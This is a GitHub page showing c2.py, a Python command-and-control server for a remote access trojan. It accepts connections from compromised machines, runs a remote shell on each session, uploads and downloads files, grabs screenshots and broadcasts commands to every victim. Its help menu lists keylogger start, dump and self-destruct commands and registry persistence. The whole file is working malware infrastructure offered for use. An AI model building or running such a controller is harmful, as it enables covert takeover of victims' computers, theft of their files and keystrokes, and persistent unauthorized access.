-
Notifications
You must be signed in to change notification settings - Fork 0
/
c2.py
162 lines (147 loc) · 4.76 KB
/
c2.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
import socket
import termcolor
import json
import os
import threading
import calendar
import time
from util.banner import Banner
def reliable_recv(target):
data = ''
while True:
try:
data = data + target.recv(1024).decode().rstrip()
return json.loads(data)
except ValueError:
continue
def reliable_send(target, data):
jsondata = json.dumps(data)
target.send(jsondata.encode())
def upload_file(target, file_name):
f = open(file_name, 'rb')
target.send(f.read())
def download_file(target, file_name):
f = open(file_name, 'wb')
target.settimeout(1)
chunk = target.recv(1024)
while chunk:
f.write(chunk)
try:
chunk = target.recv(1024)
except socket.timeout as e:
break
target.settimeout(None)
f.close()
def target_communication(target, ip):
while True:
command = input('* Shell~%s: ' % str(ip))
reliable_send(target, command)
if command == 'quit':
break
elif command == 'background':
break
elif command == 'clear':
os.system('clear')
elif command[:3] == 'cd ':
pass
elif command[:6] == 'upload':
upload_file(target, command[7:])
elif command[:8] == 'download':
download_file(target, command[9:])
elif command[:10] == 'screenshot':
f = open('screenshot-%d.png' % (calendar.timegm(time.gmtime())), 'wb')
target.settimeout(3)
chunk = target.recv(1024)
while chunk:
f.write(chunk)
try:
chunk = target.recv(1024)
except socket.timeout as e:
break
target.settimeout(None)
f.close()
elif command == 'help':
print(termcolor.colored('''\n
quit --> Quit Session With The Target
clear --> Clear The Screen
cd *Directory Name* --> Changes Directory On Target System
upload *file name* --> Upload File To The target Machine
download *file name* --> Download File From Target Machine
keylog_start --> Start The Keylogger
keylog_dump --> Print Keystrokes That The Target Inputted
keylog_stop --> Stop And Self Destruct Keylogger File
persistence *RegName* *fileName* --> Create Persistence In Registry'''), 'green')
else:
result = reliable_recv(target)
print(result)
def accept_connections():
while True:
if stop_flag:
break
sock.settimeout(1)
try:
target, ip = sock.accept()
targets.append(target)
ips.append(ip)
print(termcolor.colored(str(ip) + ' has connected!', 'green'))
except:
pass
targets = []
ips = []
stop_flag = False
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.bind(('127.0.0.1', 5555))
sock.listen(5)
t1 = threading.Thread(target=accept_connections)
t1.start()
print(termcolor.colored(Banner.banner(), 'green'))
print(termcolor.colored('[+] Waiting For The Incoming Connections ...\n', 'green'))
while True:
command = input('[**] Command & Control Center: ')
if command == 'targets':
counter = 0
for ip in ips:
print('Session ' + str(counter) + ' --- ' + str(ip))
counter += 1
elif command == 'clear':
if os.name == 'nt':
os.system("cls")
else:
os.system("clear")
elif command[:7] == 'session':
try:
num = int(command[8:])
tarnum = targets[num]
tarip = ips[num]
target_communication(tarnum, tarip)
except:
print('[-] No Session Under That ID Number')
elif command == 'exit':
for target in targets:
reliable_send(target, 'quit')
target.close()
sock.close()
stop_flag = True
t1.join()
break
elif command[:4] == 'kill':
targ = targets[int(command[5:])]
ip = ips[int(command[5:])]
reliable_send(targ, 'quit')
targ.close()
targets.remove(targ)
ips.remove(ip)
elif command[:7] == 'sendall':
x = len(targets)
print(x)
i = 0
try:
while i < x:
tarnumber = targets[i]
print(tarnumber)
reliable_send(tarnumber, command)
i += 1
except:
print('Failed')
else:
print(termcolor.colored('[!!] Command Doesnt Exist', 'red'))